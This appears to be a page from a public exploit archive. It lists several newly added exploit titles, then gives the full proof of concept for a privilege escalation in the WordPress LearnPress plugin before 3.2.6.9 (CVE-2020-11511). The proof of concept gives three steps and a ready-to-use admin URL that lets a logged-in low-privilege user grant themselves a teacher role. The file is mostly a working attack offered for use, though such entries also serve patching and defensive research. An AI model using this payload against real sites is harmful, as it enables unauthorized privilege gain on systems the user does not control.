c385c8068c
6 changes to exploits/shellcodes WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated) WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS) Dolibarr ERP/CRM 10.0.6 - Login Brute Force PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
18 lines
No EOL
562 B
Text
18 lines
No EOL
562 B
Text
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
|
|
# Date: 07-17-2021
|
|
# Exploit Author: nhattruong or nhattruong.blog
|
|
# Vendor Homepage: https://thimpress.com/learnpress/
|
|
# Software Link: https://wordpress.org/plugins/learnpress/
|
|
# Version: < 3.2.6.9
|
|
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
|
|
# CVE: CVE-2020-11511
|
|
|
|
POC:
|
|
1. Find out your user id
|
|
2. Login with your cred
|
|
3. Execute the payload
|
|
|
|
|
|
http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
|
|
|
|
# Done! |